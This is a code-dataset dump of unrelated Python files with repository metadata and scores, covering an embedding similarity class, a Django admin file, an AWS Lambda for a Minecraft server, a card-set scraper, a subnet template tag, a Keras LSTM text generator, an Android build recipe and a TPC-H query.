from math import sqrt
from typing import List
class Embedding:
    """A dense embedding vector with cosine-similarity support."""

    def __init__(self, embVector: List[float] = None):
        # Build a fresh list per instance: the original used `embVector=[]`,
        # a mutable default shared by every Embedding created without args.
        self.embVector: List[float] = [] if embVector is None else embVector

    def addElem(self, elem: float):
        # Bug fix: list.insert() requires an index argument and raised
        # TypeError here; append the element at the end instead.
        self.embVector.append(elem)

    def getEmbVector(self):
        return self.embVector

    def calculateSimilarity(self, anotherEmb) -> float:
        """Return the cosine similarity with ``anotherEmb``, or -1 when
        either vector is missing/empty, dimensions differ, or a vector has
        zero magnitude."""
        if anotherEmb is None:
            return -1
        other = anotherEmb.getEmbVector()
        # Bug fixes vs. the original guard: it returned -1 whenever the
        # OTHER vector was NON-empty (inverted truthiness test), called the
        # nonexistent anotherEmb.size(), and later indexed anotherEmb[i] on
        # a non-subscriptable object.
        if not self.embVector or not other or len(self.embVector) != len(other):
            return -1
        dotProduct = 0.0
        denominator1 = 0.0
        denominator2 = 0.0
        for a, b in zip(self.embVector, other):
            dotProduct += a * b
            denominator1 += a * a
            denominator2 += b * b
        denom = sqrt(denominator1 * denominator2)
        if denom == 0:
            # Zero-magnitude vector: similarity is undefined; keep the
            # class's -1 error convention instead of dividing by zero.
            return -1
        return dotProduct / denom
|
none
| 1
| 3.878644
| 4
|
|
clientes/admin.py
|
macs03/autoservicio
| 0
|
6628099
|
<reponame>macs03/autoservicio<gh_stars>0
from django.contrib import admin
from clientes.models import Clientes
# Register your models here.
admin.site.register(Clientes)
|
from django.contrib import admin
from clientes.models import Clientes
# Expose the Clientes model in the Django admin site with the default
# ModelAdmin options.
admin.site.register(Clientes)
|
en
| 0.968259
|
# Register your models here.
| 1.312581
| 1
|
src/preprocessing2/preprocess_speakers.py
|
norikinishida/discourse-parsing
| 2
|
6628100
|
SPEAKERS = [
    "Alex", "Bruce", "Chris", "David", "Elliott", "Fred", "George",
    "Henry", "Isaac", "John", "Kim", "Lee", "Mick", "Nicolas",
    "Owen", "Patrick", "Richard", "Scott", "Tom"]
def rename_speaker_names(tokens, speaker_name_to_id_uncased):
    """
    Replace every token that (case-insensitively) names a known speaker with
    its fixed alias from SPEAKERS; all other tokens pass through unchanged.

    Parameters
    ----------
    tokens: list[str]
    speaker_name_to_id_uncased: dict[str, int]

    Returns
    -------
    list[str]
    """
    def _alias(tok):
        # Lookup is done on the lowercased token; mapping values index into
        # the fixed SPEAKERS alias list.
        idx = speaker_name_to_id_uncased.get(tok.lower())
        return tok if idx is None else SPEAKERS[idx]
    return [_alias(tok) for tok in tokens]
|
SPEAKERS = [
    "Alex", "Bruce", "Chris", "David", "Elliott", "Fred", "George",
    "Henry", "Isaac", "John", "Kim", "Lee", "Mick", "Nicolas",
    "Owen", "Patrick", "Richard", "Scott", "Tom"]
def rename_speaker_names(tokens, speaker_name_to_id_uncased):
    """
    Replace every token that (case-insensitively) names a known speaker with
    its fixed alias from SPEAKERS; all other tokens pass through unchanged.

    Parameters
    ----------
    tokens: list[str]
    speaker_name_to_id_uncased: dict[str, int]

    Returns
    -------
    list[str]
    """
    def _alias(tok):
        # Lookup is done on the lowercased token; mapping values index into
        # the fixed SPEAKERS alias list.
        idx = speaker_name_to_id_uncased.get(tok.lower())
        return tok if idx is None else SPEAKERS[idx]
    return [_alias(tok) for tok in tokens]
|
en
| 0.132038
|
Parameters ---------- tokens: list[str] speaker_name_to_id_uncased: dict[str, int] Returns ------- list[str]
| 3.486684
| 3
|
lambda/command.py
|
jchrisfarris/minecraft
| 3
|
6628101
|
<reponame>jchrisfarris/minecraft
import json
import boto3
from botocore.exceptions import ClientError
import sys
import os
import logging
logger = logging.getLogger()
logger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def lambda_handler(event, context):
    # Dispatch a start/stop/restart command for the Minecraft EC2 instance
    # identified by the INSTANCE_ID environment variable.  ``event`` is
    # expected to be a dict carrying a 'command' key; unknown commands are
    # logged as errors and ignored.
    # logger.debug("Received event: " + json.dumps(event, sort_keys=True))
    # message = json.loads(event['Records'][0]['Sns']['Message'])
    message = event
    logger.info("Received message: " + json.dumps(message, sort_keys=True))
    client = boto3.client('ec2')
    instance_id = os.environ['INSTANCE_ID']
    if message['command'] == "stop":
        # Runs a shutdown script on the instance via SSM rather than
        # calling ec2 stop directly, so the server can save first.
        # TODO Make this a cleaner SSM shutdown command
        logger.info(f"Stopping Instance {os.environ['INSTANCE_ID']}")
        command = "shutdown_minecraft.sh"
        response = ssm_send_command(command)
        logger.debug(response)
    elif message['command'] == "restart":
        # Restarts only the Minecraft process, not the EC2 instance.
        # TODO Make this a cleaner SSM shutdown command
        logger.info(f"Restarting Minecraft on Instance {os.environ['INSTANCE_ID']}")
        command = "restart_minecraft.sh"
        response = ssm_send_command(command)
        logger.debug(response)
    elif message['command'] == "start":
        # 'start' boots the EC2 instance itself; NOTE(review): presumably
        # the server is launched on boot — confirm against the instance AMI.
        logger.info(f"Starting Instance {os.environ['INSTANCE_ID']}")
        response = client.start_instances(InstanceIds=[instance_id])
        logger.debug(response)
    else:
        logger.error(f"Invalid Command {message['command']}")
### End Of Function ###
def ssm_send_command(command):
    # Execute ``command`` on the instance through the SSM RunCommand
    # document named by the EXECSCRIPT environment variable; command output
    # is written to the S3 bucket from BUCKET under the 'ssm_commands'
    # prefix.  Returns the raw send_command response.
    client = boto3.client('ssm')
    response = client.send_command(
        InstanceIds=[os.environ['INSTANCE_ID']],
        DocumentName=os.environ['EXECSCRIPT'],
        DocumentVersion='$LATEST',
        TimeoutSeconds=600,
        Parameters={
            'Command': [command]
        },
        OutputS3BucketName=os.environ['BUCKET'],
        OutputS3KeyPrefix='ssm_commands',
        MaxConcurrency='50',
        MaxErrors='0',
        CloudWatchOutputConfig={
            'CloudWatchOutputEnabled': False
        }
    )
    return(response)
|
import json
import boto3
from botocore.exceptions import ClientError
import sys
import os
import logging
logger = logging.getLogger()
logger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def lambda_handler(event, context):
# logger.debug("Received event: " + json.dumps(event, sort_keys=True))
# message = json.loads(event['Records'][0]['Sns']['Message'])
message = event
logger.info("Received message: " + json.dumps(message, sort_keys=True))
client = boto3.client('ec2')
instance_id = os.environ['INSTANCE_ID']
if message['command'] == "stop":
# TODO Make this an cleaner SSM shutdown command
logger.info(f"Stopping Instance {os.environ['INSTANCE_ID']}")
command = "shutdown_minecraft.sh"
response = ssm_send_command(command)
logger.debug(response)
elif message['command'] == "restart":
# TODO Make this an cleaner SSM shutdown command
logger.info(f"Restarting Minecraft on Instance {os.environ['INSTANCE_ID']}")
command = "restart_minecraft.sh"
response = ssm_send_command(command)
logger.debug(response)
elif message['command'] == "start":
logger.info(f"Starting Instance {os.environ['INSTANCE_ID']}")
response = client.start_instances(InstanceIds=[instance_id])
logger.debug(response)
else:
logger.error(f"Invalid Command {message['command']}")
### End Of Function ###
def ssm_send_command(command):
client = boto3.client('ssm')
response = client.send_command(
InstanceIds=[os.environ['INSTANCE_ID']],
DocumentName=os.environ['EXECSCRIPT'],
DocumentVersion='$LATEST',
TimeoutSeconds=600,
Parameters={
'Command': [command]
},
OutputS3BucketName=os.environ['BUCKET'],
OutputS3KeyPrefix='ssm_commands',
MaxConcurrency='50',
MaxErrors='0',
CloudWatchOutputConfig={
'CloudWatchOutputEnabled': False
}
)
return(response)
|
en
| 0.460876
|
# logger.debug("Received event: " + json.dumps(event, sort_keys=True)) # message = json.loads(event['Records'][0]['Sns']['Message']) # TODO Make this an cleaner SSM shutdown command # TODO Make this an cleaner SSM shutdown command ### End Of Function ###
| 2.322507
| 2
|
scan_set.py
|
bransorem/Magic-Scraper
| 2
|
6628102
|
# scan_set.py
# Scan Gatherer to find out which cards are in a set, and create a list of
# multiverse ids for those cards.
# Lists of ids are stored in ids/FOO.txt, where FOO is the short code for an
# expansion set (see sets.py).
import os
import re
import sys
import urllib
#
import sets
import tools
SEARCH_URL = "http://gatherer.wizards.com/Pages/Search/Default.aspx?"\
"page=%(page)s&set=%%5B%%22%(escaped_set_name)s%%22%%5D"\
"&special=true"
#URL_RE = re.compile(r"../Card/Details\.aspx\?multiverseid=(\d+)")
URL_RE = re.compile(r"../../Handlers/Image\.ashx\?multiverseid=(\d+)")
# only pick up cards that have their image shown
ALT_VERSION_RE = \
r"../Card/Details\.aspx\?multiverseid=(\d+)\"><img[^>]+set={0}&.*?>"
class ScannerError(Exception): pass  # raised by scan_set for unknown set codes
def scan_set(short_set):
    """ Fetch and scan search result pages for the given set until we don't
    find any more new cards. Return a list of card ids. """
    try:
        full_set_name = sets.set_info[short_set].name
    except KeyError:
        raise ScannerError("Unknown set code: %s" % short_set)
    escaped_set_name = urllib.quote(full_set_name)
    ids = []
    page = 0
    print "Scanning cards for set: %s (%s)" % (short_set, full_set_name)
    # Gatherer paginates its results; keep fetching pages until one yields
    # no ids we have not already collected.
    while True:
        print "Fetching search results, page", page, "..."
        html = grab_page(page, escaped_set_name)
        new_ids = scan_page(html, short_set)
        old_length = len(ids)
        for new_id in new_ids:
            if new_id not in ids:
                ids.append(new_id)
        if old_length == len(ids):
            break # no new cards found, we're done
        else:
            page += 1
    # Sanity check against the expected card count recorded in sets.py.
    if len(ids) != sets.set_info[short_set].cards:
        print "WARNING: Expected %d cards, got %d instead" % (
            sets.set_info[short_set].cards, len(ids))
    print "Done;", len(ids), "found"
    return ids
def grab_page(page, escaped_set_name):
    """ Fetch one page of Gatherer search results and return its HTML. """
    # Explicit mapping instead of the fragile `SEARCH_URL % locals()` idiom,
    # which silently depends on local variable names matching the template.
    url = SEARCH_URL % {"page": page, "escaped_set_name": escaped_set_name}
    return tools.grab_url(url)
def scan_page(html, short_set):
    """ Scan the given HTML for URLs to cards, collect their ids, and return
    these ids. """
    ids = []
    # Cards displayed with an image link carry their multiverse id in the URL.
    for match in URL_RE.finditer(html):
        id = match.group(1)
        ids.append(id)
    # try to find alternate versions (basic lands etc)
    set_re = re.compile(ALT_VERSION_RE.replace('{0}', short_set))
    for match in set_re.finditer(html):
        id = match.group(1)
        ids.append(id)
    # to make things difficult, some sets use aliases here, e.g. 'OD' instead
    # of 'ODY', etc
    alias = sets.set_info[short_set].alias # may be None
    if alias:
        set_re = re.compile(ALT_VERSION_RE.replace('{0}', alias))
        for match in set_re.finditer(html):
            id = match.group(1)
            ids.append(id)
    return ids
def write_ids(short_set, ids):
    """ Write one multiverse id per line to ids/<short_set>.txt, creating the
    ids/ directory on first use. """
    filename = os.path.join('ids', "%s.txt" % short_set)
    if not os.path.exists('ids'): os.mkdir('ids')
    f = open(filename, 'wb')
    for id in ids:
        print >> f, id
    f.close()
if __name__ == "__main__":
    # Usage: python scan_set.py SET [SET ...], where SET is a short set code
    # from sets.py; each set's ids are scanned and written to ids/SET.txt.
    for short_set in sys.argv[1:]:
        ids = scan_set(short_set)
        write_ids(short_set, ids)
|
# scan_set.py
# Scan Gatherer to find out which cards are in a set, and create a list of
# multiverse ids for those cards.
# Lists of ids are stored in ids/FOO.txt, where FOO is the short code for an
# expansion set (see sets.py).
import os
import re
import sys
import urllib
#
import sets
import tools
SEARCH_URL = "http://gatherer.wizards.com/Pages/Search/Default.aspx?"\
"page=%(page)s&set=%%5B%%22%(escaped_set_name)s%%22%%5D"\
"&special=true"
#URL_RE = re.compile(r"../Card/Details\.aspx\?multiverseid=(\d+)")
URL_RE = re.compile(r"../../Handlers/Image\.ashx\?multiverseid=(\d+)")
# only pick up cards that have their image shown
ALT_VERSION_RE = \
r"../Card/Details\.aspx\?multiverseid=(\d+)\"><img[^>]+set={0}&.*?>"
class ScannerError(Exception): pass
def scan_set(short_set):
""" Fetch and scan search result pages for the given set until we don't
find any more new cards. Return a list of card ids. """
try:
full_set_name = sets.set_info[short_set].name
except KeyError:
raise ScannerError("Unknown set code: %s" % short_set)
escaped_set_name = urllib.quote(full_set_name)
ids = []
page = 0
print "Scanning cards for set: %s (%s)" % (short_set, full_set_name)
while True:
print "Fetching search results, page", page, "..."
html = grab_page(page, escaped_set_name)
new_ids = scan_page(html, short_set)
old_length = len(ids)
for new_id in new_ids:
if new_id not in ids:
ids.append(new_id)
if old_length == len(ids):
break # no new cards found, we're done
else:
page += 1
if len(ids) != sets.set_info[short_set].cards:
print "WARNING: Expected %d cards, got %d instead" % (
sets.set_info[short_set].cards, len(ids))
print "Done;", len(ids), "found"
return ids
def grab_page(page, escaped_set_name):
url = SEARCH_URL % locals()
return tools.grab_url(url)
def scan_page(html, short_set):
""" Scan the given HTML for URLs to cards, collect their ids, and return
these ids. """
ids = []
for match in URL_RE.finditer(html):
id = match.group(1)
ids.append(id)
# try to find alternate versions (basic lands etc)
set_re = re.compile(ALT_VERSION_RE.replace('{0}', short_set))
for match in set_re.finditer(html):
id = match.group(1)
ids.append(id)
# to make things difficult, some sets use aliases here, e.g. 'OD' instead
# of 'ODY', etc
alias = sets.set_info[short_set].alias # may be None
if alias:
set_re = re.compile(ALT_VERSION_RE.replace('{0}', alias))
for match in set_re.finditer(html):
id = match.group(1)
ids.append(id)
return ids
def write_ids(short_set, ids):
filename = os.path.join('ids', "%s.txt" % short_set)
if not os.path.exists('ids'): os.mkdir('ids')
f = open(filename, 'wb')
for id in ids:
print >> f, id
f.close()
if __name__ == "__main__":
for short_set in sys.argv[1:]:
ids = scan_set(short_set)
write_ids(short_set, ids)
|
en
| 0.910655
|
# scan_set.py # Scan Gatherer to find out which cards are in a set, and create a list of # multiverse ids for those cards. # Lists of ids are stored in ids/FOO.txt, where FOO is the short code for an # expansion set (see sets.py). # #URL_RE = re.compile(r"../Card/Details\.aspx\?multiverseid=(\d+)") # only pick up cards that have their image shown Fetch and scan search result pages for the given set until we don't find any more new cards. Return a list of card ids. # no new cards found, we're done Scan the given HTML for URLs to cards, collect their ids, and return these ids. # try to find alternate versions (basic lands etc) # to make things difficult, some sets use aliases here, e.g. 'OD' instead # of 'ODY', etc # may be None
| 3.114717
| 3
|
templating/tag_contributions/src/main/python/jsonteng_contribs/tags/ipv4_subnet_tag.py
|
vmware/json-template-engine
| 21
|
6628103
|
<filename>templating/tag_contributions/src/main/python/jsonteng_contribs/tags/ipv4_subnet_tag.py
# Copyright 2019 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import ipaddress
from jsonteng.exception import TemplateEngineException
from jsonteng.tags.tag_base import TagBase
class Ipv4SubnetTag(TagBase):
    """
    Divide a network into N number of subnets. Return i_th of the subnet.
    """
    name = "ipv4-subnet"

    def __init__(self, tag_resolver):
        """
        Construct this tag.
        :param tag_resolver: Tag resolver
        :type tag_resolver: 'TagResolver'
        """
        super().__init__(tag_resolver)
        self._element_resolver = tag_resolver.get_element_resolver()

    def process(self, tag_tokens, binding_data_list):
        """
        Process this tag.
        :param tag_tokens: Tag arguments: network CIDR, subnet count
            (must be a positive power of two), subnet index.
        :type tag_tokens: 'list'
        :param binding_data_list: Binding data used during the processing.
        :type binding_data_list: 'list'
        :return: JSON object (the i-th subnet in CIDR notation)
        :rtype: JSON object
        """
        token_count = len(tag_tokens)
        if token_count < 3:
            raise TemplateEngineException(
                "Tag \"{}\" requires 3 parameters."
                " Parameters given {}".format(Ipv4SubnetTag.name, tag_tokens))
        network = ipaddress.ip_network(self._element_resolver.resolve(
            tag_tokens[0], binding_data_list))
        subnet_count = int(self._element_resolver.resolve(
            tag_tokens[1], binding_data_list))
        subnet_index = int(self._element_resolver.resolve(
            tag_tokens[2], binding_data_list))
        # Guard against zero/negative counts: the bit-scan loop below would
        # never terminate on them (in Python, -1 >> 1 stays -1 forever).
        if subnet_count < 1:
            raise TemplateEngineException(
                "Subnet count must be multiple of 2s."
                " {} is given".format(subnet_count))
        # Count the trailing one-bits of (subnet_count - 1); a power of two
        # consumes them all, leaving count == 0, anything else does not.
        base2_exp = 0
        count = subnet_count - 1
        while count & 1:
            base2_exp += 1
            count = count >> 1
        if count:
            raise TemplateEngineException(
                "Subnet count must be multiple of 2s."
                " {} is given".format(subnet_count))
        if base2_exp == 0:
            # Splitting into one subnet is the identity: echo the input token.
            return tag_tokens[0]
        subnet_prefix = network.prefixlen + base2_exp
        # Offset the network base address by subnet_index subnet-sized strides
        # (32-bit IPv4 address arithmetic).
        subnet_address = ipaddress.ip_address(
            int(network.network_address)
            + (subnet_index << (32 - subnet_prefix)))
        return str(subnet_address) + '/' + str(subnet_prefix)
|
<filename>templating/tag_contributions/src/main/python/jsonteng_contribs/tags/ipv4_subnet_tag.py
# Copyright 2019 VMware, Inc.
# SPDX-License-Indentifier: Apache-2.0
import ipaddress
from jsonteng.exception import TemplateEngineException
from jsonteng.tags.tag_base import TagBase
class Ipv4SubnetTag(TagBase):
"""
Divide a network into N number of subnets. Return i_th of the subnet.
"""
name = "ipv4-subnet"
def __init__(self, tag_resolver):
"""
Construct this tag.
:param tag_resolver: Tag resolver
:type tag_resolver: 'TagResolver'
"""
super().__init__(tag_resolver)
self._element_resolver = tag_resolver.get_element_resolver()
def process(self, tag_tokens, binding_data_list):
"""
Process this tag.
:param tag_tokens: Tag arguments.
:type tag_tokens: 'list'
:param binding_data_list: Binding data used during the processing.
:type binding_data_list: 'list'
:return: JSON object
:rtype: JSON object
"""
token_count = len(tag_tokens)
if token_count < 3:
raise TemplateEngineException(
"Tag \"{}\" requires 3 parameters."
" Parameters given {}".format(Ipv4SubnetTag.name, tag_tokens))
network = ipaddress.ip_network(self._element_resolver.resolve(
tag_tokens[0], binding_data_list))
subnet_count = int(self._element_resolver.resolve(
tag_tokens[1], binding_data_list))
subnet_index = int(self._element_resolver.resolve(
tag_tokens[2], binding_data_list))
base2_exp = 0
count = int(subnet_count) - 1
while count & 1:
base2_exp += 1
count = count >> 1
if count:
raise TemplateEngineException(
"Subnet count must be multiple of 2s."
" {} is given".format(subnet_count))
if base2_exp == 0:
return tag_tokens[0]
subnet_prefix = network.prefixlen + base2_exp
subnet_address = ipaddress.ip_address(
int(network.network_address)
+ (subnet_index << (32 - subnet_prefix)))
return str(subnet_address) + '/' + str(subnet_prefix)
|
en
| 0.533798
|
# Copyright 2019 VMware, Inc. # SPDX-License-Indentifier: Apache-2.0 Divide a network into N number of subnets. Return i_th of the subnet. Construct this tag. :param tag_resolver: Tag resolver :type tag_resolver: 'TagResolver' Process this tag. :param tag_tokens: Tag arguments. :type tag_tokens: 'list' :param binding_data_list: Binding data used during the processing. :type binding_data_list: 'list' :return: JSON object :rtype: JSON object
| 2.456422
| 2
|
lstm.py
|
parismita/Text-Generation-by-LSTM
| 0
|
6628104
|
<reponame>parismita/Text-Generation-by-LSTM
import numpy,re,keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils

# Character-level LSTM text generator (Python 2 / old Keras API):
# load a corpus, train a next-character model, then sample 1000 characters.

# load the text file
t= "humanAction.txt"
#t = "hello.txt"
text = open(t).read()
# reduce the vocabulary the LSTM has to learn: lower-case everything
text = text.lower()
# keep only the first half of the corpus (integer division under Python 2)
text = text[:1136761/2]
# strip everything that is not a word character or a newline
pattern=re.compile("[^\w\n]")
text = pattern.sub(' ', text)
# map characters to integers and back, for encoding inputs / decoding outputs
chars = sorted(list(set(text)))
char_to_int = dict((c,i) for i,c in enumerate(chars))
int_to_char = dict((i, c) for i, c in enumerate(chars))
n_chars = len(text)
n_vocab = len(chars)
print n_chars , n_vocab
# build training samples: each input is a 100-char window of the text and the
# target is the single character that follows that window
seq_length = 100
dataX = []
dataY = []
for i in range(0, n_chars - seq_length, 1):
    seq_in = text[i:i + seq_length]
    seq_out = text[i + seq_length]
    dataX.append([char_to_int[char] for char in seq_in])
    dataY.append(char_to_int[seq_out])
n_patterns = len(dataX)
#print "Total Patterns: ", n_patterns
# training data in LSTM input format (samples, time steps, features)
trainX = numpy.reshape(dataX, (n_patterns, seq_length, 1))
# normalize X to [0, 1]
trainX = trainX / float(n_vocab)
# one-hot encode the target characters
trainY = np_utils.to_categorical(dataY)
#print trainY.shape,trainX.shape
import sys
# define the LSTM model
model = Sequential()
model.add(LSTM(512, input_shape=(trainX.shape[1], trainX.shape[2]),return_sequences=False))
model.add(Dropout(0.5))
model.add(Dense(trainY.shape[1], activation='softmax'))
# resume training from a previously saved checkpoint (file must exist locally)
model.load_weights("weights-improvement-17-1.2324.hdf5")
#adamax= keras.optimizers.Adamax(lr=0.005)
model.compile(loss='categorical_crossentropy', optimizer='adamax',metrics=['accuracy'])
# checkpoint the lowest-loss weights seen so far after each epoch
filepath="weights-improvement-{epoch:02d}-{loss:.4f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
model.summary()
model.fit(trainX, trainY, nb_epoch=20,validation_split=0.40, batch_size=100,callbacks=callbacks_list)
# seed generation with a random training window
start = numpy.random.randint(0, len(dataX)-1)
pattern = dataX[start]
print "Seed:"
print "\"", ''.join([int_to_char[value] for value in pattern]), "\""
# generate characters greedily (argmax), sliding the window one char at a time;
# output goes to both stdout and output1.txt (appended)
text_file = open("output1.txt", "a")
for i in range(1000):
    x = numpy.reshape(pattern, (1, len(pattern), 1))
    x = x / float(n_vocab)
    prediction = model.predict(x, verbose=0)
    index = numpy.argmax(prediction)
    result = int_to_char[index]
    seq_in = [int_to_char[value] for value in pattern]
    sys.stdout.write(result)
    text_file.write(result)
    pattern.append(index)
    pattern = pattern[1:len(pattern)]
print "\nDone."
|
import numpy,re,keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
#load the text file
t= "humanAction.txt"
#t = "hello.txt"
text = open(t).read()
#to reduce the vocabulay lstm has to learn(only read lower case char)
text = text.lower()
text = text[:1136761/2]
#removing special charecters
pattern=re.compile("[^\w\n]")
text = pattern.sub(' ', text)
#mapping char to integers
chars = sorted(list(set(text)))
char_to_int = dict((c,i) for i,c in enumerate(chars))
int_to_char = dict((i, c) for i, c in enumerate(chars))
n_chars = len(text)
n_vocab = len(chars)
print n_chars , n_vocab
seq_length = 100
dataX = []
dataY = []
for i in range(0, n_chars - seq_length, 1):
seq_in = text[i:i + seq_length]
seq_out = text[i + seq_length]
dataX.append([char_to_int[char] for char in seq_in])
dataY.append(char_to_int[seq_out])
n_patterns = len(dataX)
#print "Total Patterns: ", n_patterns
#training data in format (sample, time step,features)
trainX = numpy.reshape(dataX, (n_patterns, seq_length, 1))
# normalize X
trainX = trainX / float(n_vocab)
trainY = np_utils.to_categorical(dataY)
#print trainY.shape,trainX.shape
import sys
# define the LSTM model
model = Sequential()
model.add(LSTM(512, input_shape=(trainX.shape[1], trainX.shape[2]),return_sequences=False))
model.add(Dropout(0.5))
model.add(Dense(trainY.shape[1], activation='softmax'))
model.load_weights("weights-improvement-17-1.2324.hdf5")
#adamax= keras.optimizers.Adamax(lr=0.005)
model.compile(loss='categorical_crossentropy', optimizer='adamax',metrics=['accuracy'])
filepath="weights-improvement-{epoch:02d}-{loss:.4f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
model.summary()
model.fit(trainX, trainY, nb_epoch=20,validation_split=0.40, batch_size=100,callbacks=callbacks_list)
start = numpy.random.randint(0, len(dataX)-1)
pattern = dataX[start]
print "Seed:"
print "\"", ''.join([int_to_char[value] for value in pattern]), "\""
# generate characters
text_file = open("output1.txt", "a")
for i in range(1000):
x = numpy.reshape(pattern, (1, len(pattern), 1))
x = x / float(n_vocab)
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
sys.stdout.write(result)
text_file.write(result)
pattern.append(index)
pattern = pattern[1:len(pattern)]
print "\nDone."
|
en
| 0.717514
|
#load the text file #t = "hello.txt" #to reduce the vocabulay lstm has to learn(only read lower case char) #removing special charecters #mapping char to integers #print "Total Patterns: ", n_patterns #training data in format (sample, time step,features) # normalize X #print trainY.shape,trainX.shape # define the LSTM model #adamax= keras.optimizers.Adamax(lr=0.005) # generate characters
| 2.9697
| 3
|
src/python-for-android/recipes/eth-account/__init__.py
|
homdx/EtherollApp
| 0
|
6628105
|
<filename>src/python-for-android/recipes/eth-account/__init__.py<gh_stars>0
from pythonforandroid.recipe import PythonRecipe
class EthAccountRecipe(PythonRecipe):
    """python-for-android recipe for the `eth-account` package.

    NOTE(review): the class was originally named ``EthRlpRecipe`` — a likely
    copy-paste from the eth-rlp recipe; renamed to match the package this
    recipe actually builds. The module-level ``recipe`` attribute, which is
    the interface python-for-android loads, is unchanged.
    """

    # Upstream release of https://github.com/ethereum/eth-account to build.
    version = '0.2.2'
    url = 'https://github.com/ethereum/eth-account/archive/v{version}.tar.gz'
    # Build requirements: one of the host Pythons, plus setuptools.
    depends = [('python2', 'python3crystax'), 'setuptools']
    # Patch out setuptools-markdown, which would pull extra deps at build time.
    patches = ['disable-setuptools-markdown.patch']


recipe = EthAccountRecipe()
|
<filename>src/python-for-android/recipes/eth-account/__init__.py<gh_stars>0
from pythonforandroid.recipe import PythonRecipe
class EthRlpRecipe(PythonRecipe):
version = '0.2.2'
url = 'https://github.com/ethereum/eth-account/archive/v{version}.tar.gz'
depends = [('python2', 'python3crystax'), 'setuptools']
patches = ['disable-setuptools-markdown.patch']
recipe = EthRlpRecipe()
|
none
| 1
| 1.77275
| 2
|
|
apps/tpch-12.py
|
A-JM/quokka
| 0
|
6628106
|
<filename>apps/tpch-12.py
import sys
sys.path.append("/home/ubuntu/quokka/")
import datetime
import time
from quokka_runtime import TaskGraph
from sql import AggExecutor, JoinExecutor
import pandas as pd
import ray
import os
task_graph = TaskGraph()
def batch_func(results):
    """Partially aggregate TPC-H Q12 over a list of joined DataFrames.

    For every frame, classify each row as high priority (o_orderpriority of
    1-URGENT or 2-HIGH) or low priority (anything else), count both classes
    per l_shipmode, then sum the per-frame counts into one aggregate.

    :param results: list of DataFrames with at least the columns
        ``o_orderpriority`` and ``l_shipmode``.
    :return: one-element list holding the combined aggregate (columns
        ``('high', 'sum')`` and ``('low', 'sum')``, indexed by l_shipmode),
        or ``[]`` when *results* is empty.
    """
    aggs = []
    for df in results:
        # Work on a copy so the temporary classification columns do not
        # mutate the caller's frames (the original wrote into them).
        df = df.copy()
        is_high = (df["o_orderpriority"] == "1-URGENT") | (df["o_orderpriority"] == "2-HIGH")
        df["high"] = is_high.astype(int)
        df["low"] = (~is_high).astype(int)
        aggs.append(df.groupby("l_shipmode").agg({'high': ['sum'], 'low': ['sum']}))
    if not aggs:
        # Guard: the original indexed aggs[0] unconditionally and raised
        # IndexError on an empty batch.
        return []
    for i in range(1, len(aggs)):
        # fill_value=0 keeps ship modes that appear in only some frames.
        aggs[0] = aggs[0].add(aggs[i], fill_value=0)
    return [aggs[0]]
# Column lists for the raw TPC-H .tbl files; the trailing "null" column
# presumably absorbs the separator that terminates each row — TODO confirm
# against the loader in quokka_runtime.
lineitem_scheme = ["l_orderkey","l_partkey","l_suppkey","l_linenumber","l_quantity","l_extendedprice",
    "l_discount","l_tax","l_returnflag","l_linestatus","l_shipdate","l_commitdate","l_receiptdate","l_shipinstruct",
    "l_shipmode","l_comment", "null"]
order_scheme = ["o_orderkey", "o_custkey","o_orderstatus","o_totalprice","o_orderdate","o_orderpriority","o_clerk",
    "o_shippriority","o_comment", "null"]
# Projection / predicate pushdown applied while the CSVs are scanned.
orders_filter = lambda x: x[["o_orderkey","o_orderpriority"]]
# TPC-H Q12 predicate: MAIL/SHIP line items received during 1994, shipped
# before commit and committed before receipt.
lineitem_filter = lambda x: x[((x.l_shipmode == "MAIL") | (x.l_shipmode == "SHIP")) & (x.l_commitdate < x.l_receiptdate)
    & (x.l_shipdate < x.l_commitdate) & (x.l_receiptdate >= pd.to_datetime(datetime.date(1994,1,1))) & (x.l_receiptdate < pd.to_datetime(datetime.date(1995,1,1)))][["l_orderkey","l_shipmode"]]
# Choose input buckets/paths by the first CLI argument ("small" = toy data).
if sys.argv[1] == "small":
    print("DOING SMALL")
    orders = task_graph.new_input_csv("tpc-h-small","orders.tbl",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
    lineitem = task_graph.new_input_csv("tpc-h-small","lineitem.tbl",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
else:
    orders = task_graph.new_input_csv("tpc-h-csv","orders/orders.tbl.1",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
    lineitem = task_graph.new_input_csv("tpc-h-csv","lineitem/lineitem.tbl.1",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
# Join orders with filtered line items on the order key, aggregating each
# joined batch with batch_func, then combine the partial aggregates.
join_executor = JoinExecutor(left_on="o_orderkey",right_on="l_orderkey", batch_func=batch_func, left_primary = True)
output_stream = task_graph.new_non_blocking_node({0:orders,1:lineitem},join_executor,{'localhost':2, '172.31.16.185':2}, {0:"o_orderkey", 1:"l_orderkey"})
agg_executor = AggExecutor()
agged = task_graph.new_blocking_node({0:output_stream}, None, agg_executor, {'localhost':1}, {0:None})
task_graph.initialize()
start = time.time()
task_graph.run()
print("total time ", time.time() - start)
print(agged.to_pandas.remote())
#import pdb;pdb.set_trace()
|
<filename>apps/tpch-12.py
